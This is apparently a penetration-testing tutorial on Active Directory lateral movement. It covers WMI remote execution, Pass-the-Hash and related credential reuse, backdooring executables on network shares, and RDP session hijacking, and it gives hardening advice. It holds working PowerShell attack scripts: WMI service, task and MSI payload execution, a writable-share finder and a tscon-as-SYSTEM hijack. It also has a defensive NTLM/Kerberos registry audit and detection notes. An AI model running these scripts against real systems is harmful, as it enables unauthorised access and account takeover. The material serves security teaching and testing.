Active Directory (Part 11.2)
Lateral Movement and Pivoting
These are the general techniques attackers use to move between systems inside a network or domain once they have an initial foothold. Penetration testers should be familiar with these tactics.
WMI Lateral Movement
WMI enables administrators to perform various management tasks on Windows systems. It is based on the WBEM standard, an enterprise standard for management information across devices. It is useful for tasks like reading system information, starting and stopping services and executing processes remotely. The same capabilities can be abused by attackers to move from one system to another within a network.
The penetration tester can interact with WMI from PowerShell. A WMI session is established over one of two transports, DCOM (Distributed Component Object Model, carried over RPC) or WSMan (Web Services Management, the protocol behind WinRM), and is then used to perform management tasks on the remote Windows system. Through WMI it is possible to remotely spawn a process: once the request is sent, the process is created on the remote system and the call returns immediately. Services and scheduled tasks can be created remotely in the same way.
WMI can also install software. The MSI (Microsoft Installer) format is the standard packaging format for Windows application installers, and WMI exposes an install method that takes the path of an MSI package on the target system. The attacker first copies the package to the target by whatever means are available, such as an SMB file share or by exploiting a vulnerability on the system, and then sends a WMI request pointing at that location; the installer then runs on the target.
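The WMI steps described above (session over DCOM or WSMan, remote process, service, scheduled task, MSI install), as an added PowerShell example that is not code from the original post. Every host name, account, path and task name is a placeholder: it assumes a target host TARGET, an account ZA\attacker with local admin rights on TARGET, and payload files already staged under C:\Windows\Temp on the target.

```powershell
# Added example, not from the original post. Placeholders: TARGET, ZA\attacker, payload paths.
$cred = Get-Credential -Credential 'ZA\attacker'          # prompts for the password

# 1. Open the session. DCOM rides on RPC (TCP/135 plus dynamic ports); WSMan is WinRM
#    (TCP/5985, or 5986 for HTTPS). Use -Protocol Wsman if the target exposes WinRM instead.
$opt     = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName TARGET -Credential $cred -SessionOption $opt

# 2. Spawn a process. Win32_Process.Create returns at once; ReturnValue 0 means accepted.
$proc = Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = 'powershell.exe -NoProfile -Command "whoami > C:\Windows\Temp\who.txt"'
}
"Process: ReturnValue=$($proc.ReturnValue) PID=$($proc.ProcessId)"

# 3. Create a service and start it; services run as LocalSystem unless told otherwise.
#    ServiceType 16 = own process, ErrorControl 1 = normal; both are uint8 in the WMI schema.
$svc = Invoke-CimMethod -CimSession $session -ClassName Win32_Service -MethodName Create -Arguments @{
    Name = 'UpdaterSvc'; DisplayName = 'Updater Service'; PathName = 'C:\Windows\Temp\payload.exe'
    ServiceType = [byte]16; ErrorControl = [byte]1; StartMode = 'Manual'
}
"Service: ReturnValue=$($svc.ReturnValue)"
Get-CimInstance -CimSession $session -ClassName Win32_Service -Filter "Name='UpdaterSvc'" |
    Invoke-CimMethod -MethodName StartService | Out-Null

# 4. Register a scheduled task as SYSTEM over the same session and fire it immediately.
$action = New-ScheduledTaskAction -CimSession $session -Execute 'cmd.exe' -Argument '/c C:\Windows\Temp\payload.exe'
Register-ScheduledTask -CimSession $session -TaskName 'UpdaterTask' -Action $action -User 'NT AUTHORITY\SYSTEM' | Out-Null
Start-ScheduledTask -CimSession $session -TaskName 'UpdaterTask'

# 5. Install an MSI that is first copied over SMB (ADMIN$ maps to C:\Windows). The copy
#    uses the current logon token, so run this shell as ZA\attacker or start it with runas /netonly.
Copy-Item -Path .\payload.msi -Destination '\\TARGET\ADMIN$\Temp\payload.msi'
$msi = Invoke-CimMethod -CimSession $session -ClassName Win32_Product -MethodName Install -Arguments @{
    PackageLocation = 'C:\Windows\Temp\payload.msi'; Options = ''; AllUsers = $false
}
"MSI: ReturnValue=$($msi.ReturnValue)"

Remove-CimSession $session
```

Each of the four WMI calls needs only the one CIM session, which is why this is attractive to an attacker: one set of credentials, one network connection, and no agent on the target. From the defender's side, every step leaves a WmiPrvSE.exe child process on the target with the parent/child relationship that endpoint telemetry can key on.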
Alternate Authentication Material
This refers to any material that can be used to authenticate as a Windows account without knowing the user's password. The two protocols relevant here are NTLM (NT LAN Manager) and Kerberos.
If the penetration tester cannot obtain clear-text passwords or easily cracked hashes, he may be left with uncracked NTLM hashes. The hash cannot be typed in as a password, but NTLM authentication only ever proves knowledge of the hash, so the hash alone is enough. This technique is known as Pass-the-Hash (PtH): it lets an attacker authenticate as the account to any service or domain that accepts NTLM authentication, without the plaintext password.
To extract NTLM hashes, the penetration tester can use mimikatz either to read the local SAM or to dump hashes directly from LSASS memory. Kerberos tickets and session keys can also be extracted from LSASS memory with mimikatz; this generally requires SYSTEM privileges on the victim machine. Once a suitable ticket has been extracted, the tester can inject it into the current logon session (Pass-the-Ticket), after which it is used transparently by any tool that authenticates with Kerberos during lateral movement.
Overpass-the-Hash (OtH) and Pass-the-Key (PtK) are two related attacks. Instead of speaking NTLM, they use the NTLM hash (OtH) or a Kerberos encryption key such as an AES key (PtK), both extracted from LSASS, to request a Kerberos TGT for the account, again without the plaintext password. The resulting ticket can then be used wherever Kerberos authentication is accepted.
Some of the methods to defend against such attacks are:
- Implement strong password policies.
- Use multi-factor authentication.
- Disable NTLM if possible.
- Secure the Kerberos authentication process, for example by enforcing AES encryption types and retiring RC4 (which removes the NTLM-hash-as-RC4-key path used by Overpass-the-Hash, although a stolen AES key still works for Pass-the-Key).
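A host-side check for the "disable NTLM" and "secure Kerberos" items in the list above, as an added example that is not from the original post. It reads the registry values behind the corresponding security policy settings and compares them with the hardened value; it assumes it is run as an administrator on the host being audited, and the policy names in the comments are the ones shown in the Local Security Policy editor.

```powershell
# Added example, not from the original post. Run elevated on the host being audited.
$lsa  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$msv  = "$lsa\MSV1_0"
$kerb = "$lsa\Kerberos\Parameters"

function Get-RegValue($Path, $Name) {
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { 'not set' } else { $item.$Name }
}

# Weak versus hardened values:
#   LmCompatibilityLevel         0-2 still allow LM/NTLMv1; 5 = send NTLMv2 only, refuse LM and NTLMv1
#                                ("Network security: LAN Manager authentication level")
#   RestrictSendingNTLMTraffic   0 = allow all; 2 = deny all ("Restrict NTLM: Outgoing NTLM traffic")
#   RestrictReceivingNTLMTraffic 0 = allow all; 2 = deny all ("Restrict NTLM: Incoming NTLM traffic")
#   SupportedEncryptionTypes     bit 0x4 = RC4, 0x8 = AES128, 0x10 = AES256; 0x18 (24) = AES only
#                                ("Network security: Configure encryption types allowed for Kerberos")
$checks = @(
    @{ Path = $lsa;  Name = 'LmCompatibilityLevel';         Hardened = 5 },
    @{ Path = $msv;  Name = 'RestrictSendingNTLMTraffic';   Hardened = 2 },
    @{ Path = $msv;  Name = 'RestrictReceivingNTLMTraffic'; Hardened = 2 },
    @{ Path = $kerb; Name = 'SupportedEncryptionTypes';     Hardened = 24 }
)

foreach ($c in $checks) {
    $current = Get-RegValue $c.Path $c.Name
    $state   = if ($current -eq $c.Hardened) { 'OK' } else { 'WEAK' }
    '{0,-5} {1,-30} current={2,-8} hardened={3}' -f $state, $c.Name, $current, $c.Hardened
}
```

"not set" means the Windows default applies, which for the NTLM restriction values is "allow", so treat it as WEAK. Note the limit of this hardening: once NTLM is refused and RC4 is gone, Pass-the-Hash and Overpass-the-Hash with the NTLM hash stop working, but an attacker who has dumped the AES keys from LSASS can still Pass-the-Key, which is why protecting LSASS itself (and using MFA and strong passwords, as listed above) remains necessary.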
User Behavior Abuse
Sometimes an attacker can take advantage of actions performed by users to gain access to further machines in the network. One possibility is finding a shortcut to a script or executable hosted on a network share. Keeping executables on a network share lets users run them on their systems without installing them. However, if an attacker has write permissions on these executables, he can backdoor them and make users run any payload he chooses. When a user runs an executable from the network share, it is copied to their temporary folder and executed on their workstation, so the payload runs in the context of the user's account. This method lets the payload run on many systems without the attacker touching each one individually.
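An added example, not from the original post, of the enumeration step this abuse starts with: walking a share for executables, scripts and shortcuts, reporting who is granted write access on each file, and confirming whether the current account can actually open the file for writing. The share path is a placeholder.

```powershell
# Added example, not from the original post. Placeholder share path; run as the account you hold.
$share     = '\\FILESERVER\Tools'
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'

Get-ChildItem -Path $share -Recurse -File -Include *.exe,*.bat,*.ps1,*.vbs,*.lnk -ErrorAction SilentlyContinue |
ForEach-Object {
    $file = $_

    # 1. Who is granted write on the file? Informational: it tells you which account to become
    #    if the current one cannot write.
    $writers = (Get-Acl -Path $file.FullName).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and ($_.FileSystemRights -band $writeBits) } |
        ForEach-Object { $_.IdentityReference.Value }

    # 2. Can *this* account really open it for writing? This is the test that counts:
    #    share-level permissions and Deny ACEs are not visible in the file ACL alone.
    try {
        $fs = [System.IO.File]::Open($file.FullName, 'Open', 'Write', 'ReadWrite'); $fs.Close()
        $state = 'WRITABLE'
    } catch { $state = 'read-only' }

    # 3. For shortcuts, show where they point: repointing a .lnk is as good as backdooring the EXE.
    $target = if ($file.Extension -eq '.lnk') {
        (New-Object -ComObject WScript.Shell).CreateShortcut($file.FullName).TargetPath
    } else { '' }

    [pscustomobject]@{
        Path = $file.FullName; State = $state
        Writers = ($writers -join ', '); ShortcutTarget = $target
    }
} | Format-Table -AutoSize
```

Opening the file for write (step 2) modifies nothing and succeeds only if both the share permissions and the NTFS ACL allow it, which makes it more reliable than reading the ACL; the catch branch also swallows sharing violations, so a file that is currently open by another user is reported as read-only even if the ACL would allow a write later. The same loop run by the defender, as a low-privilege user, is a quick audit of which share contents users can tamper with.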
RDP hijacking is another common technique. When an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, the session stays disconnected but alive on the server indefinitely. On Windows Server 2016 and earlier, a user with SYSTEM privileges can take over any such existing session without being asked for a password. If the penetration tester has administrator-level access, there are several ways to get SYSTEM, such as running the takeover command as a Windows service.
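The takeover described above, as an added example that is not from the original post. It lists the sessions on the host with query user, picks the first disconnected one, and runs tscon as SYSTEM by wrapping it in a temporary service. It assumes a local administrator shell on a Windows Server 2016 or older host reached over RDP; the session names and IDs come from the listing at run time, and the sample output shown in the comment is constructed for illustration.

```powershell
# Added example, not from the original post. Run from an administrator shell inside your own RDP session.
# 1. Parse `query user`. "Disc" = the user closed the client without logging off.
#    Constructed sample output for reference:
#      USERNAME   SESSIONNAME   ID  STATE   IDLE TIME  LOGON TIME
#     >attacker   rdp-tcp#3      2  Active       .     1/1/2024 9:00 AM
#      admin                     1  Disc     1:23     1/1/2024 8:00 AM
$sessions = query user 2>$null | Select-Object -Skip 1 | ForEach-Object {
    if ($_ -match '^\s*(?<me>>?)(?<user>\S+)\s+(?:(?<name>\S+)\s+)?(?<id>\d+)\s+(?<state>\w+)') {
        [pscustomobject]@{
            Mine  = ($Matches.me -eq '>')
            User  = $Matches.user
            Name  = $Matches.name          # empty for disconnected sessions
            Id    = [int]$Matches.id
            State = $Matches.state
        }
    }
}
$mine   = $sessions | Where-Object Mine
$victim = $sessions | Where-Object { $_.State -eq 'Disc' } | Select-Object -First 1
if (-not $victim) { throw 'No disconnected session to hijack.' }
"Attaching session $($victim.Id) ($($victim.User)) to $($mine.Name)"

# 2. tscon will only attach someone else's session without a password when it runs as SYSTEM.
#    A service's binary starts as LocalSystem, so register tscon as a throw-away service.
#    /dest: is *your* session name; the victim's desktop replaces yours when it succeeds.
sc.exe create hijack binPath= "cmd.exe /c tscon $($victim.Id) /dest:$($mine.Name)"
sc.exe start hijack      # reports error 1053 (not a real service); the attach still happens
sc.exe delete hijack
```

The service trick is the part that requires administrator rights; tscon itself is a built-in tool, so on the detection side the interesting event is a service whose binary path contains tscon (Event ID 7045 in the System log) followed by a session reconnect (4778) for a user who never typed a password.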
Conclusion:
This part continues the lateral movement and pivoting topic with further attack methods, WMI, alternate authentication material and abuse of user behaviour, together with the corresponding preventions.